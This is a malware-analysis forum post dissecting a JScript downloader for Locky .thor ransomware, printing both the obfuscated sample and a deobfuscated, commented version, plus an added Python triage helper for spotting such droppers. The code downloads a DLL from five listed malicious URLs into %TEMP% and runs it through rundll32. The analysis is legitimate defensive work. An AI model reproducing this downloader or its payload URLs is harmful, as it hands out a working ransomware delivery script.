Malware Analysis: Very bad obfuscation method :p - Nov 08 - Locky .thor downloader

DardiM

From https://malwaretips.com/threads/08-11-2016-4.65237/
Thanks to @Daniel Hidalgo

NRV_054BB15_.js

Why this sample?

I think that my numerous penguin children at home could have made the same level of protection :D

I will show you an example of what must not be used in a script...
All AV tools that don't detect it at static / heuristic scan could be criticized.

9/54
https://www.hybrid-analysis.com/sam...ecb4283681c611b19c41897377e?environmentId=100

1) What it looks like:

You really must look at the spoiler part :)

TAo3d8h1r5p5f8o7g0o9f2k6d7v9v8r9g5y0p7b1q0i8i1x1f8j1u5t3o3b9y6i7o4o7u7r7i1t6a3r3e3j7f7p0n2v4n9x3g4v7a2 = ["http ://henanbusiness.net/xzwl8m2b", "http ://himichesko-varna.com/fzqrolxe", "http ://fototour.pl/hv9wgx80", "http ://choopchirk.net/349u8", "http ://rokematin.com/3ekauq6y"];
KVe3q3z5t8e5r8q7v1j1a2x6v8k8o7b3t0h5j6x7r8d5w3m3q5q5j1d2r5d6e4o3v7i7u6o7c5i4t6b7h6e6k6w5b5l3h5b1u5f9h6 = "r3wZioifc";

var Cd0l2n7x7r4i2q5h3k1f7k4f9b5l2s9u3b5c2j2t6i4k0o2p4c4h6z5k0m0m9g9i3z5e6u8q5i7d3z1p0i4e8n6s0l1z0r5j7e6i2 = 1;

var Ya2c7p7u5v1j6w4b7z4e3p6q1s6x8c6g2q2w7y9v3g8c0u5l1e9t1g4t9r0z8h5n6d6t6l0f8a1h5d7e2k4p1u1y1i3y2j5z2j0f7 = 2;

var EXs2h3a9x0j3y2d1j5k3c3q4e7o4o9m8j9j3o9i2m6i0f2x0h0g9a5n4o2x4j2f2t0v6u9m0l0w7y7o2i5m2p5b9p6h8r4m8a9p3p8 = 2;

var Pp3m5m1i5p3f1x1x3y6i0d6z2i1n0o1r5m4h7i2q8h9e3i5d0g6l8j6i1n2t0w7b4g8m0j6z9n3i5d2s0c7z5d7w2o8m7v2r7h0h2 = "437";

var GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0 = WScript["CreateObject"]("WScript.Shell");

var DFq1l1o6e2x7p4g5b1t4d7j8p8m5i0k2u0p8k4c1y0p3d1e8k6s0c4a2i9n6e7h7m1u3n4m9q9b5k2r1r6l9b8c6d4j0s5z3h4n9w7 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%TEMP%/");

var WCp9s5f3z3o6u2p8v3m6o3i8n7m0a3t0r1c5r1v6k1w2h7b2m9b3b6m5b1x6o7i6s5m5o0d5m0f3o3s6l5q3u0h7r1s0n0w5b7w2e2 = DFq1l1o6e2x7p4g5b1t4d7j8p8m5i0k2u0p8k4c1y0p3d1e8k6s0c4a2i9n6e7h7m1u3n4m9q9b5k2r1r6l9b8c6d4j0s5z3h4n9w7 + KVe3q3z5t8e5r8q7v1j1a2x6v8k8o7b3t0h5j6x7r8d5w3m3q5q5j1d2r5d6e4o3v7i7u6o7c5i4t6b7h6e6k6w5b5l3h5b1u5f9h6;

var XBh1v8v6g5u4g4y0q5d4r8h7o5a2h7g8b4n0n3y7t3b0x7x8p0d0p8m4c8u3s4p9r9w6m6m8r9b5p1q1i8a6u8c0a7y6h2e9y3f4h5 = WCp9s5f3z3o6u2p8v3m6o3i8n7m0a3t0r1c5r1v6k1w2h7b2m9b3b6m5b1x6o7i6s5m5o0d5m0f3o3s6l5q3u0h7r1s0n0w5b7w2e2 + ".d" + "ll";

var LRa3w7w2h4k0n8j3u1c5v9o5b9k8e2k7q3h1z9a1s4h6s0s7l1l2h9n6x2d3h5x5j4l3t8k9a0a3s0l7l4b4z6o4i4i2v1q7d0u7d5 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.Environment("System");

if (LRa3w7w2h4k0n8j3u1c5v9o5b9k8e2k7q3h1z9a1s4h6s0s7l1l2h9n6x2d3h5x5j4l3t8k9a0a3s0l7l4b4z6o4i4i2v1q7d0u7d5("PROCESSOR_ARCHITECTURE").toLowerCase() == "amd64")

{

var YDm0u2f4w1o5c0d0a7k9t9v2e0o9f1f1y9j8a9v4q7p5z4x9j4m5r2l6q9f7u8m1s1x8b6q8f4g3v2i3s5e6t5n5u4l4d6l7i4j5d8 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%SystemRoot%\\SysWOW64\\rundll32.exe");

} else

{

var YDm0u2f4w1o5c0d0a7k9t9v2e0o9f1f1y9j8a9v4q7p5z4x9j4m5r2l6q9f7u8m1s1x8b6q8f4g3v2i3s5e6t5n5u4l4d6l7i4j5d8 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%SystemRoot%\\system32\\rundll32.exe");

}

var NMc9b1f9x4d9m9y6v9f1v7q2o9d6k1m7p5q9h4x8n9q1i6i1e1r4i3p0n9d3k5b6l7f0t1q8g4s3i9e5g6m4c0u1e8b6k1d3m4u6c5 = ["MSXML2.XMLHTTP", "WinHttp.WinHttpRequest.5.1"];

for (var TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4 = 0; TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4 < NMc9b1f9x4d9m9y6v9f1v7q2o9d6k1m7p5q9h4x8n9q1i6i1e1r4i3p0n9d3k5b6l7f0t1q8g4s3i9e5g6m4c0u1e8b6k1d3m4u6c5["length"]; TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4++)

{

try

{

var Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0 = WScript["CreateObject"](NMc9b1f9x4d9m9y6v9f1v7q2o9d6k1m7p5q9h4x8n9q1i6i1e1r4i3p0n9d3k5b6l7f0t1q8g4s3i9e5g6m4c0u1e8b6k1d3m4u6c5[TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4]);

break;

} catch (e)

{

continue;

}

};

var XCh8h9c3z2x0q1h8t4x3o7v6c6s2t5u1y9p7d2f8a9y7k7r6q5c0g5p4t9q1h9v5a9z0g7q0x2b7k7i4b7r8u0f0f0e5p5t6e2u5w9 = new ActiveXObject("Scripting.FileSystemObject");

var Ya3e8q6b2p9n4v0x8t1n0f8h4i0x1x5f0r4n9v4j6o3e3v2i3l0v5g3h0u8b1n7x2x1u7q7f1r1t1s6k5d3w6z9p7w1v1f6c5n9y0 = 0;

for (var Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 = 0; Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 < TAo3d8h1r5p5f8o7g0o9f2k6d7v9v8r9g5y0p7b1q0i8i1x1f8j1u5t3o3b9y6i7o4o7u7r7i1t6a3r3e3j7f7p0n2v4n9x3g4v7a2.length; Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 = Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 + 1)

{

try

{
Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0["open"]("GET", TAo3d8h1r5p5f8o7g0o9f2k6d7v9v8r9g5y0p7b1q0i8i1x1f8j1u5t3o3b9y6i7o4o7u7r7i1t6a3r3e3j7f7p0n2v4n9x3g4v7a2[Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7], false);

Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0["send"]();

while (Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0.readystate < 4) WScript["Sleep"](100);

var TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8 = WScript["CreateObject"]("ADODB.Stream");

TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["open"]();

TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["type"] = Cd0l2n7x7r4i2q5h3k1f7k4f9b5l2s9u3b5c2j2t6i4k0o2p4c4h6z5k0m0m9g9i3z5e6u8q5i7d3z1p0i4e8n6s0l1z0r5j7e6i2;

TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["write"](Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0["ResponseBody"]);

TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["position"] = 0;

TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["SaveToFile"](XBh1v8v6g5u4g4y0q5d4r8h7o5a2h7g8b4n0n3y7t3b0x7x8p0d0p8m4c8u3s4p9r9w6m6m8r9b5p1q1i8a6u8c0a7y6h2e9y3f4h5, EXs2h3a9x0j3y2d1j5k3c3q4e7o4o9m8j9j3o9i2m6i0f2x0h0g9a5n4o2x4j2f2t0v6u9m0l0w7y7o2i5m2p5b9p6h8r4m8a9p3p8);


TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["close"]();

var Ei7n7p2z6e0y7t7a4s3b4n9z5z2t8d3u2e8k1b5i5j7c2d3p9c6m4z6a8n4o9r4b3v0g7u2n0o1e1b7o3z9y7j6o3g9c7s6r9e2d7 = XCh8h9c3z2x0q1h8t4x3o7v6c6s2t5u1y9p7d2f8a9y7k7r6q5c0g5p4t9q1h9v5a9z0g7q0x2b7k7i4b7r8u0f0f0e5p5t6e2u5w9.GetFile(XBh1v8v6g5u4g4y0q5d4r8h7o5a2h7g8b4n0n3y7t3b0x7x8p0d0p8m4c8u3s4p9r9w6m6m8r9b5p1q1i8a6u8c0a7y6h2e9y3f4h5);

var JBi4d1w3e7n3u3e9f1a1v0k2x9h2y6p2m1l8x4n4z8a5u6a4s7y6u9t8e5l6n6g0u1m6h5s7i9j8s8y5z4i7p3o2b4r2y3v9i7o3z5 = Ei7n7p2z6e0y7t7a4s3b4n9z5z2t8d3u2e8k1b5i5j7c2d3p9c6m4z6a8n4o9r4b3v0g7u2n0o1e1b7o3z9y7j6o3g9c7s6r9e2d7.ShortPath;

GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0["Run"](YDm0u2f4w1o5c0d0a7k9t9v2e0o9f1f1y9j8a9v4q7p5z4x9j4m5r2l6q9f7u8m1s1x8b6q8f4g3v2i3s5e6t5n5u4l4d6l7i4j5d8 + " " + JBi4d1w3e7n3u3e9f1a1v0k2x9h2y6p2m1l8x4n4z8a5u6a4s7y6u9t8e5l6n6g0u1m6h5s7i9j8s8y5z4i7p3o2b4r2y3v9i7o3z5 + ",woody");

WScript.Quit(0);

} catch (e) {
continue;
};

}

WScript.Quit(0);

Some parts:

var Pp3m5m1i5p3f1x1x3y6i0d6z2i1n0o1r5m4h7i2q8h9e3i5d0g6l8j6i1n2t0w7b4g8m0j6z9n3i5d2s0c7z5d7w2o8m7v2r7h0h2 = "437";

var GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0 = WScript["CreateObject"]("WScript.Shell");

var DFq1l1o6e2x7p4g5b1t4d7j8p8m5i0k2u0p8k4c1y0p3d1e8k6s0c4a2i9n6e7h7m1u3n4m9q9b5k2r1r6l9b8c6d4j0s5z3h4n9w7 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%TEMP%/");


2-2) A quick look at the code gives us a lot of info:

- all variables have very long names to "obfuscate"
- all important values are in the clear (object creation, function names...)
- formatting is very chaotic.

2-3) Replacement of variable names:

tab_URLs = [
"http ://henanbusiness.net/xzwl8m2b",
"http ://himichesko-varna.com/fzqrolxe",
"http ://fototour.pl/hv9wgx80",
"http ://choopchirk.net/349u8",
"http ://rokematin.com/3ekauq6y"
];

file = "r3wZioifc";

=> file name
var type = 1;
var para_save_file = 2;

var shell = WScript["CreateObject"]("WScript.Shell");

=> object Shell created
var path = shell.ExpandEnvironmentStrings("%TEMP%/");

=> %TEMP%/ => C:\Users\DardiM\AppData\Local\Temp
var path_file = path + file;

=> C:\Users\DardiM\AppData\Local\Temp\r3wZioifc
var path_file_dll = path_file + ".d" + "ll";

=> C:\Users\DardiM\AppData\Local\Temp\r3wZioifc.dll
var tab_of_system_strings = shell.Environment("System");

if (tab_of_system_strings("PROCESSOR_ARCHITECTURE").toLowerCase() == "amd64")
{
=> which processor architecture is used?

var path_rundll32 = shell.ExpandEnvironmentStrings("%SystemRoot%\\SysWOW64\\rundll32.exe");
=> 64 bit : C:\Windows\SysWOW64\rundll32.exe
} else {

var path_rundll32 = shell.ExpandEnvironmentStrings("%SystemRoot%\\system32\\rundll32.exe");
=> 32 bit: C:\Windows\System32\rundll32.exe
}

var tab_Method_HTTP = [
"MSXML2.XMLHTTP",
"WinHttp.WinHttpRequest.5.1"
];
=> methods that can be used for connections
for (var index = 0; index < tab_Method_HTTP["length"]; index++)
{
try
{
var obj_http = WScript["CreateObject"](tab_Method_HTTP[index]);

=> creates an HTTP object from the tab that contains the two methods

break;

=> if one method works: quit the for loop
} catch (e)

{

continue;

=> continue until one method works
}
};

var obj_FSO = new ActiveXObject("Scripting.FileSystemObject");

for (var index = 0; index < tab_URLs.length; index = index + 1)
{

try
{
obj_http["open"]("GET", tab_URLs[index], false);
obj_http["send"]();

while (obj_http.readystate < 4)
WScript["Sleep"](100);

var obj_stream = WScript["CreateObject"]("ADODB.Stream");

=> object stream created to retrieve the response of the request
obj_stream["open"]();
obj_stream["type"] = type;

obj_stream["write"](obj_http["ResponseBody"]);

=> response data written on the stream
obj_stream["position"] = 0;
obj_stream["SaveToFile"](path_file_dll, para_save_file);

=> file saved; overwrite if it already exists (para_save_file = 2)
obj_stream["close"]();

var obj_File = obj_FSO.GetFile(path_file_dll);

=> C:\Users\DardiM\AppData\Local\Temp\r3wZioifc.dll
var small_file_path = obj_File.ShortPath;

=> get the short file name : C:\Users\DardiM\AppData\Local\Temp\R3WZIO~1.DLL
shell["Run"](path_rundll32 + " " + small_file_path + ",woody");

WScript.Quit(0);

} catch (e) {
continue;
};

}
WScript.Quit(0);
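
To automate the two steps above (spotting the long random identifiers noted in 2-2 and renaming them as done by hand in 2-3), here is an added Python triage helper; it is not part of the original post or of the sample, and the identifier pattern, the ten-pair threshold, the token list and the constructed input are all assumptions made for this example.

```python
"""Triage helpers for JScript droppers hidden behind long random identifiers, in the
style of the NRV_054BB15_.js sample. Added example, not the post's code; thresholds are assumed."""
import re

# Identifier shape seen in the sample: one or two leading letters followed by a
# long run of letter+digit pairs ("GJp3b4r3u3d9..."). Ten pairs is an assumed cut-off.
OBF_IDENT = re.compile(r"\b[A-Za-z]{1,2}(?:[a-z]\d){10,}\b")
STRING_LIT = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Vocabulary the sample combines into download-and-run behaviour.
SUSPICIOUS = ("WScript.Shell", "ADODB.Stream", "SaveToFile", "ResponseBody", "rundll32", "WinHttpRequest", "XMLHTTP")

def rename_identifiers(src: str) -> tuple[str, dict[str, str]]:
    """Map every obfuscated name to v0, v1, ... in order of first appearance."""
    mapping: dict[str, str] = {}
    for m in OBF_IDENT.finditer(src):
        mapping.setdefault(m.group(0), f"v{len(mapping)}")
    return OBF_IDENT.sub(lambda m: mapping[m.group(0)], src), mapping

def extract_strings(src: str) -> dict[str, list[str]]:
    """Sort the clear-text literals into URLs, COM ProgIDs and everything else."""
    found: dict[str, list[str]] = {"urls": [], "progids": [], "other": []}
    for lit in STRING_LIT.findall(src):
        if re.match(r"https?\s*:\s*//", lit):          # also accepts defanged "http ://"
            found["urls"].append(lit)
        elif (re.fullmatch(r"[A-Za-z]\w*(?:\.\w+)+", lit)
              and not lit.lower().endswith((".dll", ".exe"))):  # file names are not ProgIDs
            found["progids"].append(lit)
        else:
            found["other"].append(lit)
    return found

def suspicious_tokens(src: str) -> list[str]:
    return [t for t in SUSPICIOUS if t.lower() in src.lower()]

def looks_like_dropper(src: str) -> bool:
    """Static heuristic: several random-looking names plus the WSH/COM download vocabulary."""
    _, mapping = rename_identifiers(src)
    return len(mapping) >= 3 and len(suspicious_tokens(src)) >= 3

# Constructed input in the sample's style (not the real file); defanged URL on a reserved test domain.
SAMPLE = '''TAo3d8h1r5p5f8o7g0o9f2k6d7v9v8r9g5y0p7 = ["http ://example.invalid/abc"];
var GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4 = WScript["CreateObject"]("WScript.Shell");
var TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9 = WScript["CreateObject"]("ADODB.Stream");
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9["SaveToFile"]("r3w.dll", 2);
'''

if __name__ == "__main__":
    clean, names = rename_identifiers(SAMPLE)
    print(clean, names, extract_strings(SAMPLE), looks_like_dropper(SAMPLE), sep="\n")
```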
3) Conclusion:

A very easy-to-understand script, whose only protection is very long variable names made of random letters.

From:

http ://henanbusiness.net/xzwl8m2b,
http ://himichesko-varna.com/fzqrolxe,
http ://fototour.pl/hv9wgx80,
http ://choopchirk.net/349u8,
http ://rokematin.com/3ekauq6y

The first URL that works is used to download a file:

- r3wZioifc.dll
in the folder:

- C:\Users\DardiM\AppData\Local\Temp\

Run part:

Using the rundll32 determined by our OS version:

=> C:\Windows\SysWOW64\rundll32.exe
=> C:\Windows\System32\rundll32.exe
shell["Run"](path_rundll32 + " " + small_file_path + ",woody");

=> small_file_path : "C:\Users\fredd\AppData\Local\Temp\\R3WZIO~1.DLL"

=> entry point of the DLL: woody => necessary for it to work
Payload: Locky .thor
Very easy method used....
A very good example to start teaching your children about malware scripts ...:D
 